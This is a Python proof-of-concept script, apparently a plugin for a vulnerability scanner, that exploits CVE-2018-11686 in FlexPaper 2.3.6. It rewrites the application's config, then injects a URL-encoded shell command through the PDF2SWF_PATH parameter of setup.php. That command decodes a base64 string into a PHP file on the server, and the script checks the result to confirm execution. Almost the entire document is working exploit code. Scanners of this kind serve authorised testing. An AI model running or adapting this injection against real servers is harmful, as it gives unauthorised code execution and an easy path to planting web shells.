/script/flexpaper/CVE-2018-11686.py

https://github.com/orleven/Tentacle · Python · 50 lines · 44 code · 3 blank · 3 comment · 12 complexity · e0702a0ea268fc5de0357f09f9b5eccf MD5 · raw file 

    

  1. #!/usr/bin/env python
    2. 

  2. # -*- coding: utf-8 -*-
    3. 

  3. # @author: 'orleven'
    4. 

  4. 

  5. from lib.utils.connect import ClientSession
    6. 

  6. from lib.core.enums import VUL_LEVEL
    7. 

  7. from lib.core.enums import VUL_TYPE
    8. 

  8. from lib.core.enums import SERVICE_PORT_MAP
    9. 

  9. from script import Script
    10. 

  10. 

  11. class POC(Script):
    12. 

  12.     def __init__(self, target=None):
    13. 

  13.         self.service_type = SERVICE_PORT_MAP.WEB
    14. 

  14.         self.name = 'flexpaper 2.3.6 getshell'
    15. 

  15.         self.keyword = ['flexpaper']
    16. 

  16.         self.info = 'FlexPaper <= 2.3.6 RCE.(CVE-2018-11686)'
    17. 

  17.         self.type = VUL_TYPE.RCE
    18. 

  18.         self.level = VUL_LEVEL.HIGH
    19. 

  19.         self.refer = 'https://mp.weixin.qq.com/s/8eBwfW231Nm02Lz8La2P1w'
    20. 

  20.         Script.__init__(self, target=target, service_type=self.service_type)
    21. 

  21. 

  22.     async def prove(self):
    23. 

  23.         await self.get_url()
    24. 

  24.         if self.base_url:
    25. 

  25.             path_list = list(set([
    26. 

  26.                 self.url_normpath(self.base_url, '/'),
    27. 

  27.                 self.url_normpath(self.url, './'),
    28. 

  28.             ]))
    29. 

  29.             async with ClientSession() as session:
    30. 

  30.                 for path in path_list:
    31. 

  31.                     payload = (
    32. 

  32.                         ("SAVE_CONFIG", "1"), ("PDF_Directory", "/var/www/html/flex2.3.6/flexpaper/pdf"),
    33. 

  33.                         ("SWF_Directory", "config/"),
    34. 

  34.                         ("LICENSEKEY", ""), ("splitmode", "1"), ("RenderingOrder_PRIM", "flash"), ("RenderingOrder_SEC", "html"))
    35. 

  35.                     shellcode = "%65%63%68%6f%20%50%44%39%77%61%48%41%67%63%47%68%77%61%57%35%6d%62%79%67%70%4f%7a%38%2b%20%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%65%73%74%66%6f%72%6d%65%2e%70%68%70"
    36. 

  36.                     url1 = path + "flexpaper/php/change_config.php"
    37. 

  37.                     url2 = path + "flexpaper/php/setup.php?step=2&PDF2SWF_PATH=" + shellcode
    38. 

  38.                     url3 = path + 'flexpaper/php/testforme.php'
    39. 

  39.                     async with session.post(url=url1, data=payload) as res1:
    40. 

  40.                         if res1 != None and res1.status == 200:
    41. 

  41.                             async with session.get(url=url2) as res2:
    42. 

  42.                                 if res2 != None and res2.status == 200:
    43. 

  43.                                     async with session.get(url=url3) as res3:
    44. 

  44.                                         if res3 != None:
    45. 

  45.                                             text3 = await res3.text()
    46. 

  46.                                             if "php.ini" in text3:
    47. 

  47.                                                 self.flag = 1
    48. 

  48.                                                 self.req.append({"url": url3})
    49. 

  49.                                                 self.res.append({"info": url3, "key": "flexpaper_236_getshell"})
    50. 

  50.                                                 return
    51.